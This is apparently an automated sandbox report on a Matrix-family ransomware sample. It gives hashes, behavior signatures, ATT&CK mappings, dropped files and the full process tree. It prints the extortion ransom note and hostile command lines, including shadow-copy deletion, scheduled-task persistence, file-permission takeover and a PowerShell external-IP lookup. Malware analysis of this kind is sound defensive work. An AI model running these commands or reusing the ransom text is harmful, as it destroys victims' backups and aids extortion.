Overview

overview

10

Static

static

3

FoxRansomw...65.exe

windows7-x64

10

FoxRansomw...65.exe

windows10-2004-x64

10

FoxRansomw...a7.exe

windows7-x64

10

FoxRansomw...a7.exe

windows10-2004-x64

10

FoxRansomw...20.exe

windows7-x64

10

FoxRansomw...20.exe

windows10-2004-x64

10

FoxRansomw...0b.exe

windows7-x64

10

FoxRansomw...0b.exe

windows10-2004-x64

10

FoxRansomw...53.exe

windows7-x64

10

FoxRansomw...53.exe

windows10-2004-x64

10

FoxRansomw...b1.exe

windows7-x64

10

FoxRansomw...b1.exe

windows10-2004-x64

10

Resubmissions

03-04-2024 17:37

240403-v68g6sga2w 10

Analysis

  • max time kernel
    172s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-04-2024 17:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe

  • Size

    1.2MB

  • MD5

    607d292bdcdde297252e002e613282ae

  • SHA1

    0161d2dd582d064f7e7f50ccb43478ff0884916a

  • SHA256

    0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65

  • SHA512

    2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

  • SSDEEP

    24576:J/SA+2lraRrjSJR5ezmT1dM9bB5slYQt2e8F/KpXcd:PXlOslYQt+5

Score
10/10
matrixdiscoverypersistenceransomwarespywarestealerupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected]\par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 1A4EDB7059B3CF0E\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cUPmiEDYswzWC3ZmbtybDJeUNHqSpERL1\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 1A4EDB7059B3CF0E\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 beYlZx7s\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops desktop.ini file(s) 40 IoCs
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWQ6foSs.exe"
      2⤵
        PID:1132
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWQ6foSs.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWQ6foSs.exe" -n
        2⤵
        • Executes dropped EXE
        PID:2556
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zAKPkVIO.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2856
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aOCOlY2e.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1780
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aOCOlY2e.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:664
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:1844
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:1620
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\oCDwazjM.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:936
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\oCDwazjM.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1624
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:1580
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2612
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                  PID:1592
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Run /I /tn DSHCA
                    5⤵
                      PID:1760
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\u94YVmPq.bat" "C:\pagefile.sys""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2564
                • C:\Windows\SysWOW64\attrib.exe
                  attrib -R -A -S "C:\pagefile.sys"
                  3⤵
                  • Views/modifies file attributes
                  PID:1544
                • C:\Windows\SysWOW64\cacls.exe
                  cacls "C:\pagefile.sys" /E /G Admin:F /C
                  3⤵
                    PID:1620
                  • C:\Windows\SysWOW64\takeown.exe
                    takeown /F "C:\pagefile.sys"
                    3⤵
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:396
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c zgNRceKN.exe -accepteula "pagefile.sys" -nobanner
                    3⤵
                    • Loads dropped DLL
                    PID:2704
                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zgNRceKN.exe
                      zgNRceKN.exe -accepteula "pagefile.sys" -nobanner
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:1852
                      • C:\Users\Admin\AppData\Local\Temp\zgNRceKN64.exe
                        zgNRceKN.exe -accepteula "pagefile.sys" -nobanner
                        5⤵
                        • Drops file in Drivers directory
                        • Sets service image path in registry
                        • Executes dropped EXE
                        • Enumerates connected drives
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: LoadsDriver
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2860
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {995D16FF-817D-40CA-8BA0-E35CBD8DC6EC} S-1-5-21-2461186416-2307104501-1787948496-1000:MGILJUBR\Admin:Interactive:[1]
                1⤵
                  PID:2808
                  • C:\Windows\SYSTEM32\cmd.exe
                    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat"
                    2⤵
                      PID:1620
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin Delete Shadows /All /Quiet
                        3⤵
                        • Interacts with shadow copies
                        PID:1200
                  • C:\Windows\system32\vssvc.exe
                    C:\Windows\system32\vssvc.exe
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2316

                  Network

                  MITRE ATT&CK Enterprise v15

                  Reconnaissance

                  Resource Development

                  Initial Access

                  Execution

                  Scheduled Task/Job

                  1
                  T1053

                  Persistence

                  Boot or Logon Autostart Execution

                  1
                  T1547

                  Registry Run Keys / Startup Folder

                  1
                  T1547.001

                  Scheduled Task/Job

                  1
                  T1053

                  Privilege Escalation

                  Boot or Logon Autostart Execution

                  1
                  T1547

                  Registry Run Keys / Startup Folder

                  1
                  T1547.001

                  Scheduled Task/Job

                  1
                  T1053

                  Defense Evasion

                  File and Directory Permissions Modification

                  1
                  T1222

                  Hide Artifacts

                  1
                  T1564

                  Hidden Files and Directories

                  1
                  T1564.001

                  Indicator Removal

                  2
                  T1070

                  File Deletion

                  2
                  T1070.004

                  Modify Registry

                  2
                  T1112

                  Credential Access

                  Unsecured Credentials

                  1
                  T1552

                  Credentials In Files

                  1
                  T1552.001

                  Discovery

                  Peripheral Device Discovery

                  1
                  T1120

                  Query Registry

                  1
                  T1012

                  System Information Discovery

                  2
                  T1082

                  Lateral Movement

                  Collection

                  Data from Local System

                  1
                  T1005

                  Command and Control

                  Exfiltration

                  Impact

                  Defacement

                  1
                  T1491

                  Inhibit System Recovery

                  2
                  T1490

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\Program Files\Google\Chrome\Application\#ANN_README#.rtf
                    Filesize

                    8KB

                    MD5

                    cff30227536e37da97ae89d97f68577c

                    SHA1

                    995801f8d0a9464e851ad485d25b1a75db19a484

                    SHA256

                    2913a2b99a254fde216c8364c0d6794cff7106f767d65fc339523dad3359a5e4

                    SHA512

                    9aed0bcc9ad7253c2f735c02cb960748fb84755729c45ab4dcc545fb903907848c4976d3e3bb4bb2df0c75cdc98875e8d56850e149e5467305174b6c986b10c9

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWQ6foSs.exe
                    Filesize

                    1.2MB

                    MD5

                    607d292bdcdde297252e002e613282ae

                    SHA1

                    0161d2dd582d064f7e7f50ccb43478ff0884916a

                    SHA256

                    0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65

                    SHA512

                    2bdc2ff857f9f52aac5071d3a695f7baf822a971969ba263ad03769c41af7916b558bada6bfe76fe78f730235a4ca5d2dd1cf3eaa2a59c5efef06af0a798acb8

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_1A4EDB7059B3CF0E.txt
                    Filesize

                    1KB

                    MD5

                    e87e7241839c3a978c9027d1b73cc863

                    SHA1

                    50a150c32dc5b2244d1a8d81a31562d85bd53f46

                    SHA256

                    7e256bdb89688daff00f7c9d1ac74db7e9e842163231cc890a494ed72011502c

                    SHA512

                    d38237650fb632fed7947a4da2bb41c911eaf6068db297da3140e48af77ff947e94d9b2f884b420db1e7cc1c5fe5ea6941f8052331898ae9f2bb10897b1945ba

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_1A4EDB7059B3CF0E.txt
                    Filesize

                    12KB

                    MD5

                    14a1daab52fcf74fc5ae275cd887a444

                    SHA1

                    67ba4484998a4c3d9e69f1073fe79489fdf7de75

                    SHA256

                    853e1fb0db07025ff8807264e00076378151479ef1a50bf404f3934b674ade32

                    SHA512

                    16dda5fbf4008b2b0320b0126b410e19d4e92ca9c2b2add68cb4ef2a0690b8cabab9233953a6b564f3f710dd56ef2b961177fdf2265c56829062fa3acc6cf33b

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\u94YVmPq.bat
                    Filesize

                    246B

                    MD5

                    04fdf36635621eedd8c3aeae08a644e2

                    SHA1

                    c95f9d260590bc08c7955341bb1a66c947e0fb28

                    SHA256

                    53522830e25a5a32666877a7a6e5dc44576ba1320f253f62d2756ca8aa901756

                    SHA512

                    704a0cd0c1a90fc2f60601c7a31ce8f76ef9301725698de0f52866883f54ec973f9c96004cba958519e2ca8350952c692d26b2271bfb781b6566eeb93d915111

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zAKPkVIO.txt
                    Filesize

                    16B

                    MD5

                    17d432845dc7cb55ac69d75cf72f7f5d

                    SHA1

                    7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

                    SHA256

                    a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

                    SHA512

                    25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

                    Download Submit

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\zgNRceKN.exe
                    Filesize

                    181KB

                    MD5

                    2f5b509929165fc13ceab9393c3b911d

                    SHA1

                    b016316132a6a277c5d8a4d7f3d6e2c769984052

                    SHA256

                    0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                    SHA512

                    c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\oCDwazjM.vbs
                    Filesize

                    260B

                    MD5

                    420a07b06774918f84eee2b11f9b0123

                    SHA1

                    e271b2bb3fd8f9205b866dc601ef1c380f1b7e55

                    SHA256

                    c07fc83d027e916eace536ac695e881869501192b9a52c0574dc1945643ddac8

                    SHA512

                    d6548746aee6d9c34338bb74540edebd65e189c1794e24bd9607c7a356f391a811da4a268c996cbf64a1e0db60deef9498886f97e04ba9b5001fb7057b4b7427

                    Download Submit

                  • C:\Users\Admin\AppData\Roaming\vmnLEi4e.bat
                    Filesize

                    265B

                    MD5

                    b009ce341978a0c05283d2f573e09fb6

                    SHA1

                    37487521b61bc27a9e41b79be2305042d16ad813

                    SHA256

                    4fe20e1e7ede202305bed1bf030758144ce9244aff704543df69f4c5b99f3738

                    SHA512

                    dd045f01c65d5ae0c81e55bd8a44ef71ce0b494c14a93a16e645e283d0fb940ce96e69336d683278e125c51c038304b7c6bd4a17be3d4ee61114fba0062d7fe9

                    Download Submit

                  • \Users\Admin\AppData\Local\Temp\zgNRceKN64.exe
                    Filesize

                    221KB

                    MD5

                    3026bc2448763d5a9862d864b97288ff

                    SHA1

                    7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                    SHA256

                    7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                    SHA512

                    d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                    Download Submit

                  • memory/1852-2151-0x0000000000400000-0x0000000000477000-memory.dmp

                    Filesize

                    476KB

                    Download

                  • memory/1852-1838-0x0000000000400000-0x0000000000477000-memory.dmp

                    Filesize

                    476KB

                    Download

                  • memory/2100-4292-0x0000000000400000-0x000000000053F000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2100-18-0x0000000000400000-0x000000000053F000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2100-9408-0x0000000000400000-0x000000000053F000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2100-1836-0x0000000000400000-0x000000000053F000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2100-9288-0x0000000000400000-0x000000000053F000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2100-2149-0x0000000000400000-0x000000000053F000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2100-9210-0x0000000000400000-0x000000000053F000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2100-4877-0x0000000000400000-0x000000000053F000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2556-8-0x0000000000400000-0x000000000053F000-memory.dmp

                    Filesize

                    1.2MB

                    Download

                  • memory/2704-4533-0x0000000000170000-0x00000000001E7000-memory.dmp

                    Filesize

                    476KB

                    Download

                  • memory/2704-1837-0x0000000000170000-0x00000000001E7000-memory.dmp

                    Filesize

                    476KB

                    Download

                  • memory/2856-15-0x0000000002100000-0x0000000002140000-memory.dmp

                    Filesize

                    256KB

                    Download

                  • memory/2856-11-0x0000000073810000-0x0000000073DBB000-memory.dmp

                    Filesize

                    5.7MB

                    Download

                  • memory/2856-12-0x0000000073810000-0x0000000073DBB000-memory.dmp

                    Filesize

                    5.7MB

                    Download

                  • memory/2856-14-0x0000000002100000-0x0000000002140000-memory.dmp

                    Filesize

                    256KB

                    Download

                  • memory/2856-13-0x0000000002100000-0x0000000002140000-memory.dmp

                    Filesize

                    256KB

                    Download

                  • memory/2856-16-0x0000000073810000-0x0000000073DBB000-memory.dmp

                    Filesize

                    5.7MB

                    Download